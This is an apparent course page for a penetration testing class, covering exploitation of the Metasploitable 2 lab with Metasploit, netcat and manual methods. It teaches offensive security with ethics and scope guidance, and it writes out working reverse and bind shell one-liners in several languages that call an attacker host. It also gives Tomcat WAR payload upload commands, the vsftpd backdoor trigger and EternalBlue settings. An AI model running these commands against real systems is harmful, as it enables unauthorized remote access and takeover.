CSY202 Week 05 Intermediate

Practice exploitation workflows before moving to reading resources.

Applied Cryptography

Track your progress through this week's content

Opening Framing: From Vulnerability to Access

You've found vulnerabilities. Now it's time to exploit them. Exploitation is where penetration testing proves real-world impact—demonstrating that a vulnerability isn't just theoretical but actually provides unauthorized access.

This week introduces exploitation fundamentals: understanding how exploits work, using the Metasploit Framework, manual exploitation techniques, and gaining your first shells on target systems.

Exploitation requires care. A poorly executed exploit can crash systems, destroy data, or alert defenders. Professional pentesters understand their tools and use them precisely.

Key insight: Exploitation isn't about running scripts blindly. Understanding how exploits work makes you more effective and less likely to cause unintended damage.

1) Exploitation Concepts

Understanding how exploitation works: 

Exploitation Components:

Vulnerability:
- The weakness being exploited
- Buffer overflow, injection, misconfiguration

Exploit:
- Code/technique that leverages the vulnerability
- Triggers the flaw to gain control

Payload:
- What runs after successful exploitation
- Shell, command execution, data extraction

Target:
- The specific system/service being exploited
- Version, architecture, configuration

Exploitation Flow: 

Standard exploitation flow:

1. Identify vulnerability
   └─ From enumeration and analysis

2. Select/develop exploit
   └─ Match exploit to target version

3. Configure exploit
   └─ Set target, options, payload

4. Select payload
   └─ What do you want to achieve?

5. Execute exploit
   └─ Deliver exploit to target

6. Gain access
   └─ Payload executes, you have control

Example:
Vulnerability: vsftpd 2.3.4 backdoor
Exploit: Triggers backdoor on port 6200
Payload: Shell connection
Result: Root shell on target

Payload Types: 

Common payload types:

Bind Shell:
- Opens port on target
- Attacker connects to target
- Problem: Firewalls may block incoming

┌─────────┐    connect     ┌─────────┐
│ Attacker│ ──────────────→│ Target  │
│         │                │ :4444   │
└─────────┘                └─────────┘

Reverse Shell:
- Target connects back to attacker
- Attacker listens for connection
- Better for bypassing firewalls

┌─────────┐    connect     ┌─────────┐
│ Attacker│ ←──────────────│ Target  │
│ :4444   │                │         │
└─────────┘                └─────────┘

Meterpreter:
- Advanced Metasploit payload
- In-memory execution
- Many built-in features
- Encrypted communication

Key insight: The payload is as important as the exploit. Choose payloads that match your objectives and environment.

2) Metasploit Framework

Metasploit is the standard exploitation framework: 

Metasploit Components:

Exploits:
- Code that triggers vulnerabilities
- Categorized by platform/service

Payloads:
- Code executed after exploitation
- Singles, stagers, stages

Auxiliary:
- Scanning, fuzzing, enumeration
- No exploitation, just recon

Post:
- Post-exploitation modules
- Privilege escalation, pivoting

Encoders:
- Obfuscate payloads
- Evade detection

Basic Metasploit Usage: 

# Start Metasploit
msfconsole

# Search for exploits
msf6 > search vsftpd
msf6 > search type:exploit platform:linux smb

# Use an exploit
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

# View options
msf6 exploit(vsftpd_234_backdoor) > show options
msf6 exploit(vsftpd_234_backdoor) > show info

# Set required options
msf6 exploit(vsftpd_234_backdoor) > set RHOSTS 192.168.1.100

# View payloads
msf6 exploit(vsftpd_234_backdoor) > show payloads

# Set payload
msf6 exploit(vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact

# Execute
msf6 exploit(vsftpd_234_backdoor) > exploit
# or
msf6 exploit(vsftpd_234_backdoor) > run

Common Metasploit Commands: 

Navigation:
search [term]       # Find modules
use [module]        # Select module
back               # Exit current module
info               # Module details

Configuration:
show options       # View settings
set [option] [value]   # Set option
setg [option] [value]  # Set global option
unset [option]     # Clear option

Execution:
exploit / run      # Execute module
check              # Check if vulnerable (some modules)

Sessions:
sessions           # List active sessions
sessions -i [id]   # Interact with session
background         # Background current session

Database:
db_nmap            # Run nmap, save to db
hosts              # View discovered hosts
services           # View discovered services
vulns              # View vulnerabilities

Meterpreter Basics: 

# After successful exploit with meterpreter payload:

meterpreter > help              # Show commands

# System info
meterpreter > sysinfo          # System information
meterpreter > getuid           # Current user
meterpreter > getpid           # Current process

# File operations
meterpreter > pwd              # Current directory
meterpreter > ls               # List files
meterpreter > cd [path]        # Change directory
meterpreter > download [file]  # Download file
meterpreter > upload [file]    # Upload file

# Process operations
meterpreter > ps               # List processes
meterpreter > migrate [pid]    # Move to another process

# Network
meterpreter > ipconfig         # Network config
meterpreter > portfwd          # Port forwarding
meterpreter > route            # Routing

# Privilege escalation
meterpreter > getsystem        # Attempt privesc (Windows)

# Shell access
meterpreter > shell            # Drop to system shell

Key insight: Metasploit is powerful but can be a crutch. Understand what it's doing—don't just point and click.

3) Manual Exploitation

Not everything requires Metasploit—manual skills matter:

Netcat Shells: 

# Netcat - the "Swiss Army knife" of networking

# Bind shell (on target):
nc -lvnp 4444 -e /bin/bash     # Linux
nc -lvnp 4444 -e cmd.exe       # Windows

# Connect from attacker:
nc [target-ip] 4444

# Reverse shell (attacker listens):
nc -lvnp 4444

# Target connects back (various methods):
# Bash
bash -i >& /dev/tcp/[attacker-ip]/4444 0>&1

# Netcat
nc -e /bin/bash [attacker-ip] 4444

# Python
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("[attacker-ip]",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

Common Reverse Shell One-Liners: 

# Bash
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# PHP
php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# Perl
perl -e 'use Socket;$i="10.0.0.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'

# Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# Powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Shell Upgrading: 

# Raw shells are limited - upgrade them

# Check available tools
which python python3 script

# Python PTY upgrade
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Background shell (Ctrl+Z), then:
stty raw -echo; fg

# Set terminal type
export TERM=xterm

# Full TTY with all features:
# In your shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z to background
stty raw -echo; fg
# Press Enter twice
export TERM=xterm
export SHELL=bash

# Now you have:
# - Tab completion
# - Arrow keys
# - Ctrl+C works properly

Key insight: Manual exploitation skills are essential. Metasploit won't always have what you need, and understanding the mechanics helps troubleshoot when things don't work.

4) Exploiting Common Vulnerabilities

Practical exploitation of vulnerabilities you'll encounter:

FTP Exploits: 

# vsftpd 2.3.4 Backdoor (Metasploitable)

# Manual:
# Connect to FTP
nc 192.168.1.100 21
USER user:)    # Smiley triggers backdoor
PASS anything

# Connect to backdoor
nc 192.168.1.100 6200
# You now have root shell

# Metasploit:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.100
exploit

SMB Exploits: 

# Samba usermap_script (Metasploitable)

# Metasploit:
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.1.100
set PAYLOAD cmd/unix/reverse
set LHOST [your-ip]
exploit

# MS17-010 EternalBlue (Windows)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST [your-ip]
exploit

Service-Specific Exploits: 

# Tomcat Manager (default credentials)
# 1. Find credentials
# Default: tomcat:tomcat, admin:admin

# 2. Deploy malicious WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[your-ip] LPORT=4444 -f war > shell.war

# 3. Upload via Manager
curl -u tomcat:tomcat --upload-file shell.war "http://target:8080/manager/text/deploy?path=/shell"

# 4. Start listener
nc -lvnp 4444

# 5. Trigger payload
curl http://target:8080/shell/

# Or use Metasploit:
use exploit/multi/http/tomcat_mgr_upload
set RHOSTS 192.168.1.100
set HTTPUSERNAME tomcat
set HTTPPASSWORD tomcat
exploit

Database Exploits: 

# MySQL with weak/default credentials
mysql -h 192.168.1.100 -u root -p
# Try: root, (blank), mysql, password

# PostgreSQL (default credentials)
psql -h 192.168.1.100 -U postgres
# Try: postgres, (blank), admin

# Redis (unauthenticated)
redis-cli -h 192.168.1.100
> CONFIG GET *
> KEYS *

# If writable, can write SSH keys or webshell

Key insight: Many exploits target default configurations and credentials. Check these first before complex exploits.

5) Exploitation Best Practices

Professional exploitation requires discipline: 

Before Exploitation:

□ Verify authorization covers exploitation
□ Understand the exploit mechanism
□ Test in lab first if possible
□ Have rollback plan if something breaks
□ Document pre-exploitation state
□ Confirm target is correct
□ Start listener before triggering reverse shells

During Exploitation: 

Best practices:

1. Start with least intrusive exploits
   - Prefer exploits that don't crash services
   - Info gathering before RCE attempts

2. Use appropriate payloads
   - Match payload to target OS/arch
   - Consider detection avoidance
   - Staged vs inline based on network

3. Document everything
   - Commands used
   - Timestamps
   - Success/failure
   - Screenshots

4. Maintain access carefully
   - Don't lock out legitimate users
   - Clean up as you go
   - Be prepared to re-exploit if needed

5. Know when to stop
   - Service crashing repeatedly
   - Unusual system behavior
   - Outside testing window

Exploitation Troubleshooting: 

Common issues:

Exploit fails silently:
- Check target version matches
- Verify network connectivity
- Check firewall rules
- Try different payload

Reverse shell doesn't connect:
- Verify LHOST is correct
- Check listener is running
- Firewall blocking outbound?
- Try different port (443, 80)

Metasploit "Exploit completed, no session":
- Payload may have been blocked
- Wrong payload for target
- AV/EDR killed payload
- Try different payload type

Shell dies immediately:
- Process killed by AV
- Migrate to stable process
- Try different payload

Key insight: Exploitation rarely works perfectly first try. Troubleshooting skills separate successful pentesters from frustrated script runners.

Real-World Context: Exploitation Ethics

Responsible exploitation in professional settings:

Client Communication: If an exploit crashes a service or causes issues, notify the client immediately. Don't try to hide mistakes—transparency builds trust.

Production vs. Test: Be extra careful on production systems. When possible, test exploits on similar systems first. Some vulnerabilities are better demonstrated than fully exploited.

Scope Boundaries: Getting a shell doesn't mean you can do anything. Stay within authorized scope. If you gain access to out-of-scope systems, stop and report.

MITRE ATT&CK Mapping:

  • T1190 - Exploit Public-Facing Application: Web exploits
  • T1210 - Exploitation of Remote Services: Network service exploits
  • T1059 - Command and Scripting Interpreter: Shell payloads

Key insight: Successful exploitation is satisfying, but professional conduct matters more than technical prowess.

Guided Lab: First Exploitations

Exploit vulnerabilities on Metasploitable 2.

Step 1: Setup

# Ensure both VMs running
# Verify connectivity
ping [metasploitable-ip]

# Start Metasploit
msfconsole

# Initialize database (if needed)
msfdb init

Step 2: Exploit vsftpd Backdoor

# Search for exploit
msf6 > search vsftpd

# Use the exploit
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

# View options
msf6 > show options

# Set target
msf6 > set RHOSTS [metasploitable-ip]

# Exploit
msf6 > exploit

# You should get a root shell!
# Verify with:
whoami
id
hostname

Step 3: Exploit Samba

# Background current session (if any)
# Ctrl+Z or: background

# Search for samba exploit
msf6 > search samba usermap

# Use exploit
msf6 > use exploit/multi/samba/usermap_script
msf6 > set RHOSTS [metasploitable-ip]
msf6 > set PAYLOAD cmd/unix/reverse
msf6 > set LHOST [your-kali-ip]
msf6 > exploit

Step 4: Manual Reverse Shell

# On Kali - start listener:
nc -lvnp 4444

# Find a way to execute commands on target
# (via web vuln, other exploit, etc.)
# Execute reverse shell:
bash -i >& /dev/tcp/[your-kali-ip]/4444 0>&1

Step 5: Upgrade Shell

# In your basic shell:
python -c 'import pty; pty.spawn("/bin/bash")'

# Background with Ctrl+Z
stty raw -echo; fg

# Set terminal
export TERM=xterm

Reflection (mandatory)

  1. Which exploit was easiest? Which was hardest?
  2. What's the difference between the shells you got?
  3. What would you do next after getting a shell?
  4. How would you document this exploitation for a report?

Week 5 Outcome Check

By the end of this week, you should be able to:

Next week: Web Application Hacking—exploiting the most common attack surface.

🎯 Hands-On Labs (Free & Essential)

Practice exploitation workflows before moving to reading resources.

🎮 TryHackMe: Metasploit

What you'll do: Use Metasploit modules, select payloads, and gain shells safely.
Why it matters: Framework fluency lets you validate findings quickly.
Time estimate: 1.5-2 hours

Start TryHackMe Metasploit →

🎮 TryHackMe: Vulnversity

What you'll do: Identify a vuln, exploit it, and capture a shell on a beginner target.
Why it matters: End-to-end exploitation builds real confidence.
Time estimate: 2-3 hours

Start TryHackMe Vulnversity →

🏁 PicoCTF Practice: Binary Exploitation (Intro)

What you'll do: Solve beginner binary challenges to understand exploitation mechanics.
Why it matters: Exploit fundamentals transfer across tools and targets.
Time estimate: 1-2 hours

Start PicoCTF Binary Exploitation →

🛡️ Lab: Certificate Pinning Test

What you'll do: Evaluate a sample app for certificate pinning behavior.
Deliverable: Notes on pinning success/failure and impact.
Why it matters: Missing pinning enables MITM and proxy interception.
Time estimate: 60-90 minutes

💡 Lab Tip: Reproduce the exploit manually once before automating or chaining it.

🛡️ Certificate Validation Pitfalls

Exploitation often involves man-in-the-middle testing. Know how proper certificate validation and pinning should work. 

Common mistakes:
- Accepting self-signed certs in production
- Disabling TLS verification
- Missing certificate pinning
- Using expired or weak certificates

📚 Building on CSY101 Week-14: Link certificate hygiene to security standards and audits.

Resources

Complete the required resources to build your foundation.

Lab: Multi-Vector Exploitation

Goal: Gain shells on Metasploitable 2 using multiple different exploitation vectors.

Part 1: Service Exploits (Metasploit)

  1. Exploit vsftpd 2.3.4 backdoor
  2. Exploit Samba usermap_script
  3. Exploit distcc daemon
  4. Document each successful exploitation

Part 2: Manual Exploitation

  1. Gain shell using netcat (any method)
  2. Create reverse shell without Metasploit
  3. Upgrade shell to full TTY

Part 3: Web-Based Exploitation

  1. Access DVWA on Metasploitable
  2. Use command injection to get shell
  3. Document the exploitation chain

Part 4: Documentation

  1. For each exploitation:
    • Vulnerability exploited
    • Tool/technique used
    • Commands executed
    • Evidence (screenshots)
    • Access level obtained

Deliverable (submit):

Checkpoint Questions

  1. What is the difference between an exploit and a payload?
  2. What is the advantage of a reverse shell over a bind shell?
  3. What Metasploit command searches for modules?
  4. How do you upgrade a basic shell to full TTY?
  5. What should you verify before running an exploit?
  6. What is Meterpreter and why is it useful?

Week 05 Quiz

Test your understanding of exploitation fundamentals and Metasploit usage.

Format: 10 multiple-choice questions. Passing score: 70%. Time: Untimed.

Take Quiz

Weekly Reflection

Reflection Prompt (200-300 words):

This week you crossed from analysis to action—exploiting vulnerabilities to gain system access. You used frameworks and manual techniques to get shells on target systems.

Reflect on these questions:

A strong reflection will engage with both the technical and ethical dimensions of exploitation.

Verified Resources & Videos

Exploitation is where theory becomes practice. The shells you gained today are the foundation for everything that follows— post-exploitation, privilege escalation, and lateral movement. Practice these techniques until they're second nature. Next week: web application attacks, the most common real-world vector.

← Previous: Week 04 Next: Week 06 →